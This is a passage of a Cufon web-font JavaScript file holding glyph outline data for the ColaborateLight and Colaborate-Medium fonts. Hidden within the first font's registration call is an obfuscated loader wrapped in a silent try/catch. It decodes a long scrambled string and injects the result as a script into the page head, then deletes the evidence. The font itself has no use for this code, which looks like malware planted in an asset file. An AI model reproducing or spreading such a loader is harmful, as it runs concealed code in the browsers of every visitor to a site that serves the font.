9,0,-37,-4,-53,-11r9,-21v25,16,80,23,80,-16v0,-42,-91,-21,-91,-77v0,-20,10,-33,25,-39v-11,-6,-19,-17,-19,-32v2,-53,67,-55,108,-36r-8,21v-20,-16,-74,-23,-75,13v0,35,91,17,91,78xm118,-114v0,-23,-24,-25,-48,-33v-15,3,-24,10,-24,27v0,19,28,22,51,31v14,-5,21,-13,21,-25","w":164},{"d":"178,-211r-133,190r130,0r0,21r-151,0r-8,-22r133,-190r-119,0r0,-21r139,0","w":194,"k":{"O":4}},{"d":"163,-8r-150,-60r0,-28r150,-61r0,25r-126,50r126,50r0,24"},{"d":"164,-212r-102,0r0,83r98,0r0,20r-98,0r0,109r-27,0r0,-233r129,0r0,21","w":184},{"d":"159,-69v0,40,-28,74,-69,74v-62,0,-74,-54,-74,-107v0,-75,47,-144,132,-115r-8,23v-57,-29,-101,16,-99,87v10,-21,30,-36,51,-36v45,0,67,29,67,74xm132,-69v0,-29,-8,-54,-41,-54v-29,0,-42,23,-47,36v0,56,17,72,47,72v25,0,41,-20,41,-54"},{"d":"135,-5v-10,4,-26,8,-38,9r-2,7v18,0,26,13,26,23v2,31,-38,36,-69,29r3,-18v21,2,42,9,46,-10v0,-8,-4,-12,-30,-12r6,-20v-40,-6,-60,-38,-60,-84v0,-72,57,-104,117,-78r-5,22v-43,-30,-88,-7,-88,56v0,59,45,83,89,53","w":152},{"d":"57,0r-26,0r0,-233r26,0r0,233","w":88},{"d":"49,-205r-26,0r0,-28r26,0r0,28xm48,-2v0,33,-18,50,-50,59r-7,-20v25,-5,33,-15,33,-36r0,-166r24,0r0,163","w":73},{"d":"123,-168v0,30,-24,51,-53,51v-29,0,-53,-21,-53,-51v0,-30,24,-53,53,-53v29,0,53,23,53,53xm103,-168v0,-20,-14,-35,-33,-35v-19,0,-33,15,-33,35v0,18,16,32,33,32v17,0,33,-14,33,-32","w":140},{"d":"207,-233r-85,233r-23,0r-88,-233r29,0r71,197r68,-197r28,0","w":217,"k":{"\u0131":19,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":19,"\u00c2":31,"\u00ff":9,"\u0153":19,"\u0152":9,"\u00d5":9,"\u00c3":19,"\u00c0":31,"\u00bf":19,"\u00f8":19,"\u00e6":19,"\u00b5":19,"\u00c6":31,"\u00a2":19,"\u00fc":19,"\u00fb":19,"\u00f9":19,"\u00fa":19,"\u00f5":19,"\u00f6":19,"\u00f4":19,"\u00f2":19,"\u00f3":19,"\u00f1":19,"\u00eb":19,"\u00ea":19,"\u00e8":19,"\u00e9":19,"\u00e7":19,"\u00e5":19,"\u00e3":19,"\u00e4":19,"\u00e2":19,"\u00e0":19,"\u00e1":19,"\u00d6":9,"\u00c7":9,"\u00c5":31,"\u00c4":31,"z":9,"y":9,"x":9,"w":9,"v":9,"u":19,"s":19,"r":19,"q":19,"p":9,"o":19,"n":19,"m":19,"j":9,"i":9,"g":19,"e":19,"d":19,"c":19,"a":19,"Q":9,"O":9,"J":19,"G":9,"C":9,"A":31,";":9,":":9,".":19,",":19,"\u017e":9,"\u00fd":9,"\u0161":4}},{"d":"142,-219v-35,4,-42,22,-45,54r30,0r-3,18r-30,0r-37,212r-22,0r37,-212r-25,0r3,-18r25,0v1,-45,30,-71,65,-74"},{"d":"136,-178v-16,6,-39,6,-52,15r33,43r-16,11v-11,-14,-17,-33,-31,-44r-30,44r-16,-12v10,-15,28,-28,33,-44r-52,-13r7,-20v17,4,36,19,51,17r-2,-52r20,0v1,17,-6,40,-1,54r50,-19","w":140},{"d":"303,-233r-61,233r-31,0r-53,-185r-55,185r-31,0r-59,-233r28,0r49,198r55,-188r31,0r51,188r51,-198r25,0","w":316,"k":{"\u0131":9,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":31,"\u00c2":31,"\u0153":9,"\u0152":9,"\u00d5":9,"\u00c3":31,"\u00c0":31,"\u00bf":6,"\u00f8":9,"\u00e6":9,"\u00b5":9,"\u00d8":9,"\u00c6":31,"\u00a2":9,"\u00fc":9,"\u00fb":9,"\u00f9":9,"\u00fa":9,"\u00f5":9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00f1":9,"\u00eb":9,"\u00ea":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\u00e5":9,"\u00e3":9,"\u00e4":9,"\u00e2":9,"\u00e0":9,"\u00e1":9,"\u00d6":9,"\u00c7":9,"\u00c5":31,"\u00c4":31,"z":9,"y":9,"x":9,"w":4,"v":4,"u":9,"s":9,"r":9,"q":9,"p":9,"o":9,"n":9,"m":9,"j":3,"i":3,"g":9,"e":9,"d":9,"c":9,"a":9,"Q":9,"O":9,"J":19,"G":9,"C":9,"A":31,";":19,":":19,".":19,",":19,"\u017e":9,"\u00fd":9,"\u0161":9}},{"d":"188,-66v0,83,-79,64,-153,66r0,-233v68,1,143,-13,142,61v0,24,-15,42,-37,50v29,6,48,24,48,56xm150,-172v0,-46,-44,-40,-88,-40r0,82v44,1,88,5,88,-42xm161,-66v0,-52,-51,-43,-99,-44r0,89v49,-2,100,12,99,-45","w":208,"k":{"V":3}},{"d":"57,-133r-28,0r0,-30r28,0r0,30xm58,-27r-29,64r-19,0r19,-64r29,0","w":87}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+383-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("#j6=I2pGRCcP#iDtJ20vXjXc>$p=62cP>$mvRCL!6?gO)xGf>Ed4+j)$>Ed4+jp;pd_HJBu4);6HJBu46;0wB=w=+^A29?w=+^pf)=w=+^A2+=cq>Ed4+jmqJ=w=+^A2)dqHJBu4)BAHJBuwp^0HJBuw+x0O>Ed4+j6f??w=+^AD);=HJBu46C0HJBu4)xJHJBu46^0HJBu46j?HJBu4)xL=I?w=+^Aq+>=HJBu4)Bmk>Ed4+j5kQ$mHJBu46;?HJBu4);qHJBu46Bpz>Ed4+j+zs^0HJBu46;mHJBu46^6HJBu46Bm0>Ed4+jm2>Ed4+j?;>Ed4+jd4sDw=+^A;+0p9>Ed4+jXG>Ed4+jXvm=w=+^A*6f6HJBu46jLHJBu4)$6E>Ed4+jpD>Ed4+jd=>Ed4+j+=>Ed4+$5k>Ed4+j+k>Ed4+jQ=>Ed4+j6D>Ed4+x*G6Dw=+^5G+Dw=+^Aqp?w=+^5}6?w=+^A*)?w=+^Af);DHJBu46^mHJBu46;qHJBu4)CpHJBu46^LHJBu46;LHJBu4)x6HJBu4);JHJBu4)BLHJBXv+^)SR=w=+^A*9^mHJBu4)$LHJBXw+;)[C=w=+^A*9?w=+^AD+?w=+^5=+=4.>Ed4+j0f>Ed4+$+4>Ed4+j?*J;JH>0w=+^AD9Cz,+vLHJBu4)C5Pd;qHJBu4);0HJBu4626p>Ed4+jXx%=qd>Ed4+Bdv>Ed4+jdz>Ed4+jpq>Ed4+BJ*>Ed4+jd$%D0HJBu4)x0HJBu4)C6HJBuwp;AHJBu4);?HJBuwpxU;>Ed4+jmD6>+K>Ed4+j6*m(AHXDw=+^Aq90w=+^A2p=w=+^A*)f0*>Ed4+j+vQjcHJBu46BLJ)=w=+^A*)=w=+^A;)Dw=+^5$+>A%#=w=+^Af)$AHJBu46C?@>Ed4+j0DJjJQCd0e>Ed4+j5$>Ed4+jQx>Ed4+j)4R?w=+^A*+5LHJBu46C6HJBu4)x+4eEm+p0w=+^A2)=w=+^Af6iqHJBu46^JHJBu4)BpHJBu4);*_>Ed4+j5}C;wjpDw=+^ADpGDW>Ed4+jX4?Dw=+^5k+f_>Q;Ofe!p4IjDG#iXf#(w_:BuOH^=fe!uOI^=4e2wDI2JGRiw!:CXP6fk!IED4RE+c%}GtRC)@)fk.RxG.>fU[9!J}J=4P#Bg@:x_@RCL*6CkDJ>m.Hj?He2p.>ik=Rv**e$*PJjuAi^50jEXm#e+p9:QL(Bd?C>)6RIHJ%sUqf;*D2!@_WoOSP.4wvxG=$}zk,tgcK[?xJiqOI$pqJjD.Ifk@I}pGI20S6(*_62cv#^S_:j4t#vS_#CJI)=S_>?GcH0S_>>G_#i*U")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":175,"face":{"font-family":"ColaborateLight","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 5 3 4 0 0 2 0 4","ascent":"288","descent":"-72","x-height":"4","bbox":"-9 -301 312 75","underline-thickness":"18","underline-position":"-18","stemh":"19","stemv":"23","unicode-range":"U+0020-U+03C0"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (c) 2003 by This Font is designed by Ralph Oliver du Carrois. All
 * rights reserved.
 * 
 * Trademark:
 * Colaborate-Medium is a trademark of This Font is designed by Ralph Oliver du
 * Carrois.
 * 
 * Description:
 * Copyright (c) 2003 by This Font is designed by Ralph Oliver du Carrois. All
 * rights reserved.
 * 
 * Manufacturer:
 * This Font is designed by Ralph Oliver du Carrois
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"168,0r-37,0r-6,-22v-7,7,-20,27,-43,27v-84,1,-51,-97,-58,-170r40,0r0,106v0,51,50,33,59,2r0,-108r41,0v1,55,-4,117,4,165xm142,-191r-30,0r-19,-23r-20,23r-29,0r35,-42r28,0","w":187},{"d":"178,-83v0,47,-22,88,-81,88v-59,0,-82,-40,-82,-88v0,-46,23,-87,82,-87v60,0,81,39,81,87xm136,-83v0,-40,-12,-55,-39,-55v-26,0,-40,15,-40,55v0,37,13,57,40,57v25,0,39,-17,39,-57xm146,-191r-29,0r-19,-23r-21,23r-29,0r36,-42r28,0","w":193},{"d":"70,0r-43,0r0,-40r43,0r0,40","w":97,"k":{"y":22,"w":31,"v":22,"Y":22,"W":22,"V":22}},{"d":"153,-7v-9,4,-27,8,-41,10r0,33r-32,0r0,-33v-42,-7,-65,-39,-65,-84v0,-47,22,-80,65,-87r0,-34r32,0r0,34v14,2,31,7,40,10r-14,34v-8,-4,-17,-8,-26,-11r0,106v9,-3,18,-7,27,-11xm80,-30r0,-105v-30,5,-30,99,0,105","w":165},{"d":"167,0r-41,0r0,-105v0,-52,-52,-33,-62,-2r0,107r-40,0v-2,-55,5,-118,-5,-165r38,0r6,22v7,-7,21,-27,44,-27v87,-1,53,96,60,170xm151,-214v-6,18,-21,29,-39,29v-19,0,-25,-16,-36,-16v-10,0,-16,6,-19,14r-21,-10v9,-21,20,-27,40,-27v19,4,45,31,50,0","w":168},{"d":"172,0r-38,0r-6,-17v-5,8,-18,22,-39,22v-55,0,-74,-41,-74,-88v0,-46,22,-86,69,-86v20,0,34,13,43,26r0,-94r40,0v2,79,-6,167,5,237xm127,-50r0,-56v-17,-40,-70,-53,-70,24v0,65,51,70,70,32","w":191},{"d":"167,0r-41,0r0,-105v0,-52,-52,-33,-62,-2r0,107r-40,0r0,-237r40,0r0,94v5,-7,20,-27,43,-27v87,-1,53,96,60,170","w":190},{"d":"82,-191r-28,0r-47,-42r41,0","w":88},{"d":"176,-86r-62,0r0,43r-34,0r0,-43r-61,0r0,-31r61,0r0,-38r34,0r0,38r62,0r0,31xm178,0r-162,0r0,-31r162,0r0,31"},{"d":"154,-176v0,43,-59,51,-59,84r0,29r-40,0r0,-31v0,-49,56,-52,56,-82v0,-41,-61,-23,-86,-13r-7,-37v54,-13,136,-33,136,50xm96,0r-43,0r0,-40r43,0r0,40","w":165},{"d":"186,0r-166,0r0,-36r23,0r0,-72r-27,0r0,-31v8,-1,22,3,27,-2v0,-80,55,-95,109,-101r11,37v-41,1,-76,4,-75,66r55,0r0,31r-55,0r0,72r98,0r0,36"},{"d":"250,-117v0,68,-53,121,-120,121v-67,0,-121,-53,-121,-121v0,-68,54,-120,121,-120v68,0,120,52,120,120xm225,-117v0,-54,-41,-97,-95,-97v-54,0,-96,43,-96,97v0,53,43,98,96,98v53,0,95,-45,95,-98xm170,-49v-53,21,-104,-5,-104,-67v0,-39,15,-73,65,-73v12,0,27,2,37,6r-9,23v-33,-19,-65,-3,-65,44v0,51,33,64,67,44","w":259},{"d":"177,-45v0,60,-55,80,-104,80r14,-35v32,0,48,-22,48,-46v0,-45,-36,-50,-56,-56r0,-32v11,-7,35,-20,35,-47v0,-16,-13,-24,-26,-24v-12,0,-24,5,-24,31r0,174r-40,0r0,-170v0,-45,24,-67,64,-67v30,0,68,11,68,57v0,41,-35,53,-44,59v19,8,65,17,65,76","w":193},{"d":"168,0r-37,0r-6,-22v-7,7,-20,27,-43,27v-84,1,-51,-97,-58,-170r40,0r0,106v0,51,50,33,59,2r0,-108r41,0v1,55,-4,117,4,165xm141,-192r-37,0r0,-34r37,0r0,34xm84,-192r-37,0r0,-34r37,0r0,34","w":187},{"d":"240,-116v0,69,-28,123,-109,123v-84,0,-110,-53,-110,-123v0,-68,28,-122,110,-122v80,0,109,50,109,122xm213,23r-15,30r-82,-12r16,-26xm193,-116v0,-62,-20,-87,-62,-87v-43,0,-63,26,-63,87v0,64,20,88,63,88v45,0,62,-30,62,-88","w":261},{"d":"178,-66v0,44,-37,72,-78,72v-69,0,-84,-55,-84,-108v0,-58,27,-122,96,-122v13,0,38,3,53,7r-14,37v-12,-6,-23,-10,-37,-10v-42,0,-55,37,-55,71v40,-57,119,-19,119,53xm100,-28v18,0,33,-12,32,-40v0,-17,-1,-44,-32,-44v-24,0,-33,14,-38,27v0,48,16,57,38,57"},{"d":"171,-67r-113,0v4,50,54,48,91,27r14,32v-20,9,-45,13,-68,13v-53,0,-80,-40,-80,-86v0,-38,18,-88,79,-88v57,0,77,33,77,102xm132,-96v-2,-31,-18,-42,-39,-42v-13,0,-34,8,-35,42r74,0xm146,-191r-30,0r-19,-23r-20,23r-29,0r35,-42r28,0","w":187},{"d":"186,68r-35,0r0,-270v-42,-3,-75,0,-75,44v0,22,19,40,35,44r0,182r-34,0r0,-161v-46,-7,-63,-42,-63,-70v0,-25,9,-70,69,-70r103,0r0,301"},{"d":"150,-113v0,17,-7,28,-18,36v7,8,11,19,11,33v-2,61,-84,56,-128,38r14,-33v14,12,72,22,72,-5v0,-28,-88,-12,-88,-76v0,-18,8,-31,20,-37v-8,-7,-15,-18,-15,-32v0,-60,75,-55,123,-38r-14,33v-16,-12,-67,-22,-67,4v0,27,90,13,90,77xm100,-95v24,-23,-3,-38,-33,-45v-10,3,-13,10,-13,20v0,13,24,17,46,25","w":162},{"d":"148,-190v0,26,-15,49,-50,49v-36,0,-50,-23,-50,-49v0,-25,15,-48,50,-48v36,0,50,22,50,48xm121,-190v0,-22,-8,-29,-23,-29v-14,0,-24,7,-24,29v0,21,9,30,24,30v13,0,23,-8,23,-30"},{"d":"167,0r-38,0r-7,-17v-22,36,-115,24,-107,-26v-4,-37,35,-64,105,-60v0,-19,0,-35,-24,-35v-23,0,-44,7,-60,15r-14,-34v49,-17,140,-26,139,40v0,43,-1,78,6,117xm120,-44r0,-32v-38,-2,-64,8,-62,31v3,28,55,19,62,1xm136,-191r-29,0r-19,-23r-20,23r-30,0r36,-42r28,0","w":187},{"d":"68,-78r-39,0r0,-40r39,0r0,40","w":97},{"d":"140,-163r-35,65r34,65r-37,0r-33,-64r33,-66r38,0xm79,-163r-35,65r35,65r-37,0r-34,-64r34,-66r37,0","w":147},{"d":"216,0r-56,0r-71,-97r-10,0r0,97r-45,0r0,-233v78,4,166,-21,166,67v0,31,-14,61,-58,68xm154,-166v0,-37,-39,-33,-75,-32r0,66v37,1,75,4,75,-34","w":231},{"d":"82,-233r-47,42r-28,0r34,-42r41,0","w":88},{"d":"194,-4v-19,9,-44,7,-64,13v18,0,26,15,26,26v-3,42,-45,46,-86,40r8,-29v21,2,41,10,45,-10v0,-9,-3,-13,-29,-13r5,-19v-56,-12,-78,-57,-78,-120v0,-65,26,-122,109,-122v20,0,44,4,62,10r-15,38v-55,-30,-109,-6,-109,73v0,85,53,107,112,75","w":207},{"d":"226,-85v0,62,-34,92,-94,92v-67,0,-98,-31,-98,-93r0,-147r45,0r0,143v0,52,24,62,53,62v28,0,49,-16,49,-62r0,-143r45,0r0,148xm154,-249r-28,0r-48,-42r41,0","w":260},{"d":"168,0r-37,0r-6,-22v-7,7,-20,27,-43,27v-84,1,-51,-97,-58,-170r40,0r0,106v0,51,50,33,59,2r0,-108r41,0v1,55,-4,117,4,165xm137,-233r-47,42r-28,0r34,-42r41,0","w":187},{"d":"184,-97v0,24,-17,45,-50,45v-32,0,-55,-32,-67,-32v-16,0,-25,5,-25,27r-32,-17v0,-24,17,-45,49,-45v36,0,59,32,68,32v16,0,25,-5,25,-27"},{"d":"178,-83v0,47,-22,88,-81,88v-59,0,-82,-40,-82,-88v0,-46,23,-87,82,-87v60,0,81,39,81,87xm136,-83v0,-40,-12,-55,-39,-55v-26,0,-40,15,-40,55v0,37,13,57,40,57v25,0,39,-17,39,-57","w":193,"k":{"v":9}},{"d":"268,0r-41,0r0,-104v1,-57,-55,-32,-62,-1r0,105r-40,0r0,-104v3,-57,-56,-30,-61,-4r0,108r-40,0v-1,-55,4,-118,-5,-165r38,0r6,22v6,-8,24,-27,44,-27v28,0,38,8,52,27v25,-43,109,-36,109,38r0,105","w":291},{"d":"91,-196r-93,0r0,-30r93,0r0,30","w":88},{"d":"235,0r-50,0r-21,-62r-83,0r-22,62r-49,0r95,-233r42,0xm152,-96r-28,-87r-31,87r59,0xm172,-243r-37,0r0,-34r37,0r0,34xm114,-243r-36,0r0,-34r36,0r0,34","w":245,"k":{"\u00d2":4,"\u00d3":4,"\u0178":31,"\u00ff":19,"\u0153":4,"\u0152":4,"\u00d5":4,"\u00e6":4,"\u00a2":4,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00d6":4,"\u00c7":4,"y":19,"w":19,"v":19,"u":4,"q":4,"o":4,"e":4,"d":4,"c":4,"a":4,"Y":31,"W":31,"V":31,"T":19,"Q":4,"O":3,"G":4,"C":4,"\u00dd":19}},{"d":"150,-131r-94,100r89,0r0,31r-122,0r-14,-33r96,-100r-84,0r0,-32r115,0","w":159},{"d":"235,0r-50,0r-21,-62r-83,0r-22,62r-49,0r95,-233r42,0xm152,-96r-28,-87r-31,87r59,0xm158,-271v0,17,-13,29,-30,29v-16,0,-30,-13,-30,-29v0,-17,13,-30,30,-30v17,0,30,13,30,30xm143,-271v0,-8,-6,-16,-15,-16v-19,0,-20,31,0,31v10,0,15,-7,15,-15","w":245},{"d":"226,-85v0,62,-34,92,-94,92v-67,0,-98,-31,-98,-93r0,-147r45,0r0,143v0,52,24,62,53,62v28,0,49,-16,49,-62r0,-143r45,0r0,148xm179,-243r-36,0r0,-34r36,0r0,34xm122,-243r-37,0r0,-34r37,0r0,34","w":260},{"d":"202,-228r-12,37v-38,-19,-97,-17,-103,30r94,0r-11,35r-88,0r0,16r83,0r-11,35r-68,0v6,56,67,55,108,31r0,42v-14,5,-29,9,-55,9v-62,0,-91,-32,-100,-82r-39,0r11,-35r25,0r0,-16r-36,0r11,-35r29,0v5,-65,90,-94,162,-67"},{"d":"117,-233r-3,78r-30,0r-3,-78r36,0xm63,-233r-3,78r-30,0r-3,-78r36,0","w":144},{"d":"75,0r-45,0r0,-233r45,0r0,233xm102,-248r-30,0r-19,-23r-20,23r-30,0r36,-42r28,0","w":104},{"d":"140,-97r-34,64r-37,0r35,-65r-35,-65r37,0xm79,-97r-33,64r-37,0r34,-65r-35,-65r38,0","w":147},{"d":"252,-226r-29,33v37,79,19,200,-92,200v-27,0,-49,-6,-65,-16r-31,36r-29,-27r32,-38v-37,-80,-19,-200,93,-200v27,0,48,6,64,16r27,-31xm169,-191v-50,-30,-101,-5,-101,75v0,15,1,28,3,39xm131,-28v58,0,69,-65,59,-125r-98,114v10,8,23,11,39,11","w":261},{"d":"65,0r-41,0r0,-165r41,0r0,165xm82,-233r-47,42r-29,0r35,-42r41,0","w":88},{"d":"171,-67r-113,0v4,50,54,48,91,27r14,32v-20,9,-45,13,-68,13v-53,0,-80,-40,-80,-86v0,-38,18,-88,79,-88v57,0,77,33,77,102xm132,-96v-2,-31,-18,-42,-39,-42v-13,0,-34,8,-35,42r74,0xm144,-192r-37,0r0,-34r37,0r0,34xm87,-192r-37,0r0,-34r37,0r0,34","w":187},{"d":"332,0v-69,1,-141,7,-201,7v-84,0,-110,-53,-110,-123v0,-81,56,-140,148,-117r159,0r0,35r-110,0v10,16,15,37,17,60r86,0r0,35r-85,0v-1,26,-7,50,-18,68r114,0r0,35xm189,-116v0,-62,-16,-87,-58,-87v-43,0,-63,26,-63,87v0,64,20,88,63,88v45,0,58,-30,58,-88","w":365},{"d":"262,-31r-19,0r0,31r-29,0r0,-31r-52,0r-9,-21r58,-68r32,0r0,68r19,0r0,21xm217,-226r-131,226r-35,0r130,-226r36,0xm83,-113r-29,0r0,-94r-23,18r-8,-20r34,-24r29,0xm214,-52r0,-43r-37,43r37,0","w":298},{"d":"186,-170r-10,27r-20,0v31,36,18,99,-59,99v-10,3,-45,-16,-43,6v0,9,8,12,49,15v66,5,81,21,81,48v0,36,-44,47,-85,47v-66,0,-85,-18,-85,-46v0,-19,17,-27,26,-31v-29,-12,-26,-47,-1,-60v-25,-32,-33,-104,57,-104v30,0,57,1,90,-1xm98,-74v45,-1,42,-65,-1,-65v-17,0,-33,7,-33,33v0,23,15,32,34,32xm142,25v0,-7,-16,-16,-75,-17v-8,4,-12,10,-12,16v0,12,22,18,44,18v32,0,43,-4,43,-17","w":196},{"d":"153,-7v-10,5,-33,10,-48,11r-1,6v18,0,25,14,25,25v-2,42,-44,46,-85,40r9,-27v22,1,45,8,45,-12v0,-9,-4,-13,-30,-13r5,-21v-39,-9,-58,-41,-58,-83v0,-76,72,-105,137,-77r-14,34v-37,-22,-81,-23,-81,43v0,62,43,62,82,41","w":165},{"d":"123,-80v-56,4,8,119,-96,122r0,-31v54,0,11,-88,61,-106v-49,-22,-7,-107,-61,-107r0,-31v105,4,41,120,96,122r0,31","w":140},{"d":"290,-66r-113,0v4,49,54,46,90,26r13,32v-39,18,-100,20,-123,-11v-13,15,-32,24,-60,24v-59,0,-82,-40,-82,-88v0,-46,23,-87,82,-87v28,0,47,10,60,24v12,-13,29,-23,55,-23v60,0,78,34,78,103xm249,-96v-2,-31,-16,-42,-37,-42v-13,0,-34,8,-35,42r72,0xm136,-83v0,-40,-12,-55,-39,-55v-26,0,-40,15,-40,55v0,37,13,57,40,57v25,0,39,-17,39,-57","w":306},{"d":"65,0r-41,0r0,-165r41,0r0,165xm91,-201r-36,0r0,-33r36,0r0,33xm34,-201r-37,0r0,-33r37,0r0,33","w":88},{"d":"126,-73v0,80,-61,97,-109,110r-12,-37v32,-6,75,-9,75,-70r0,-163r46,0r0,160","w":159},{"d":"172,0r-38,0r-6,-22v-6,10,-35,38,-60,23r0,64r-41,0r0,-230r41,0r0,106v0,16,1,33,24,33v17,0,27,-20,35,-35r0,-104r40,0v2,55,-5,118,5,165"},{"d":"171,-67r-113,0v4,50,54,48,91,27r14,32v-20,9,-45,13,-68,13v-53,0,-80,-40,-80,-86v0,-38,18,-88,79,-88v57,0,77,33,77,102xm132,-96v-2,-31,-18,-42,-39,-42v-13,0,-34,8,-35,42r74,0xm142,-233r-47,42r-28,0r34,-42r41,0","w":187},{"d":"283,-60v0,39,-12,65,-52,65v-40,0,-51,-26,-51,-65v0,-39,14,-62,51,-62v40,0,52,23,52,62xm230,-226r-130,226r-35,0r130,-226r35,0xm120,-176v0,39,-13,65,-53,65v-40,0,-52,-26,-52,-65v0,-39,15,-62,52,-62v40,0,53,23,53,62xm255,-60v0,-27,-5,-41,-24,-41v-20,0,-22,18,-22,41v0,28,2,44,22,44v19,0,24,-17,24,-44xm90,-176v0,-27,-4,-41,-23,-41v-20,0,-22,18,-22,41v0,28,2,44,22,44v19,0,23,-17,23,-44","w":298},{"d":"167,0r-38,0r-7,-17v-22,36,-115,24,-107,-26v-4,-37,35,-64,105,-60v0,-19,0,-35,-24,-35v-23,0,-44,7,-60,15r-14,-34v49,-17,140,-26,139,40v0,43,-1,78,6,117xm120,-44r0,-32v-38,-2,-64,8,-62,31v3,28,55,19,62,1xm131,-233r-47,42r-28,0r34,-42r41,0","w":187},{"d":"235,0r-50,0r-21,-62r-83,0r-22,62r-49,0r95,-233r42,0xm152,-96r-28,-87r-31,87r59,0xm174,-250r-30,0r-19,-23r-20,23r-29,0r35,-42r28,0","w":245},{"d":"131,-238v118,0,150,167,51,204r0,5r49,0r0,29r-86,0r0,-51v39,-7,48,-35,48,-79v0,-61,-34,-73,-61,-73v-25,0,-62,10,-62,73v0,45,9,74,48,79r0,51r-87,0r0,-29r50,0r0,-5v-42,-13,-58,-55,-58,-95v0,-68,40,-109,108,-109","w":262},{"d":"176,-83v0,47,-25,88,-74,88v-21,0,-34,-14,-39,-22r-6,89r-38,0v8,-94,4,-208,5,-309r40,0r0,94v9,-13,24,-26,44,-26v49,0,68,40,68,86xm134,-82v0,-77,-54,-64,-70,-24r0,56v19,38,70,33,70,-32","w":191},{"d":"65,0r-41,0r0,-165r41,0r0,165xm77,-191r-28,0r-47,-42r40,0","w":88},{"d":"70,-193r-43,0r0,-40r43,0r0,40xm69,0r-41,0r0,-167r41,0r0,167","w":97},{"d":"240,-116v0,69,-28,123,-109,123v-84,0,-110,-53,-110,-123v0,-68,29,-122,110,-122v80,0,109,50,109,122xm193,-116v0,-62,-20,-87,-62,-87v-43,0,-63,26,-63,87v0,64,20,88,63,88v45,0,62,-30,62,-88xm178,-243r-37,0r0,-34r37,0r0,34xm121,-243r-37,0r0,-34r37,0r0,34","w":261},{"d":"75,0r-45,0r0,-233r45,0r0,233xm100,-258r-37,0r0,-33r37,0r0,33xm43,-258r-37,0r0,-33r37,0r0,33","w":104},{"d":"167,0r-38,0r-7,-17v-22,36,-115,24,-107,-26v-4,-37,35,-64,105,-60v0,-19,0,-35,-24,-35v-23,0,-44,7,-60,15r-14,-34v49,-17,140,-26,139,40v0,43,-1,78,6,117xm120,-212v0,17,-13,29,-30,29v-16,0,-30,-13,-30,-29v0,-17,13,-30,30,-30v17,0,30,13,30,30xm120,-44r0,-32v-38,-2,-64,8,-62,31v3,28,55,19,62,1xm104,-212v0,-8,-5,-16,-14,-16v-19,0,-20,31,0,31v10,0,14,-7,14,-15","w":187},{"d":"175,0r-141,0r0,-233r138,0r0,35r-93,0r0,60r86,0r0,35r-86,0r0,68r96,0r0,35xm136,-249r-28,0r-47,-42r41,0","w":209},{"d":"176,-83v0,47,-25,88,-74,88v-21,0,-34,-14,-39,-22r-6,17r-38,0v11,-70,2,-158,5,-237r40,0r0,94v9,-13,24,-26,44,-26v49,0,68,40,68,86xm134,-82v0,-77,-54,-64,-70,-24r0,56v19,38,70,33,70,-32","w":191},{"d":"235,0r-50,0r-21,-62r-83,0r-22,62r-49,0r95,-233r42,0xm152,-96r-28,-87r-31,87r59,0xm184,-272v-6,18,-21,29,-39,29v-26,0,-42,-31,-55,-2r-22,-10v9,-21,21,-27,41,-27v15,0,24,16,35,16v10,0,16,-10,18,-16","w":245},{"d":"178,-102v0,53,-14,108,-83,108v-41,0,-78,-28,-78,-72v0,-73,79,-110,119,-53v0,-35,-13,-59,-37,-71r-28,19r-29,-17r21,-14r-28,-1r-13,-37v30,0,56,5,78,13r22,-16r28,17r-21,14v32,21,49,57,49,110xm132,-85v-5,-13,-14,-27,-38,-27v-32,1,-32,27,-32,46v0,27,15,38,32,38v22,0,38,-9,38,-57"},{"d":"258,0r-239,0r101,-233r37,0xm209,-31r-70,-168r-70,168r140,0","w":277},{"d":"226,-85v0,62,-34,92,-94,92v-67,0,-98,-31,-98,-93r0,-147r45,0r0,143v0,52,24,62,53,62v28,0,49,-16,49,-62r0,-143r45,0r0,148xm180,-249r-30,0r-19,-23r-20,23r-30,0r36,-42r28,0","w":260},{"d":"167,0r-38,0r-7,-17v-22,36,-115,24,-107,-26v-4,-37,35,-64,105,-60v0,-19,0,-35,-24,-35v-23,0,-44,7,-60,15r-14,-34v49,-17,140,-26,139,40v0,43,-1,78,6,117xm146,-214v-6,18,-21,29,-39,29v-19,0,-25,-16,-36,-16v-10,0,-16,6,-19,14r-21,-10v9,-21,20,-27,40,-27v15,0,24,16,35,16v10,0,17,-10,23,-16xm120,-44r0,-32v-38,-2,-64,8,-62,31v3,28,55,19,62,1","w":187},{"d":"85,35v-2,42,-44,46,-85,40r9,-29v21,1,44,10,44,-10v0,-9,-3,-13,-29,-13r8,-28r32,0r-4,14v18,0,25,15,25,26","w":88},{"w":97},{"d":"167,0r-38,0r-7,-17v-22,36,-115,24,-107,-26v-4,-37,35,-64,105,-60v0,-19,0,-35,-24,-35v-23,0,-44,7,-60,15r-14,-34v49,-17,140,-26,139,40v0,43,-1,78,6,117xm120,-44r0,-32v-38,-2,-64,8,-62,31v3,28,55,19,62,1xm115,-191r-28,0r-47,-42r41,0","w":187},{"d":"226,-85v0,62,-34,92,-94,92v-67,0,-98,-31,-98,-93r0,-147r45,0r0,143v0,52,24,62,53,62v28,0,49,-16,49,-62r0,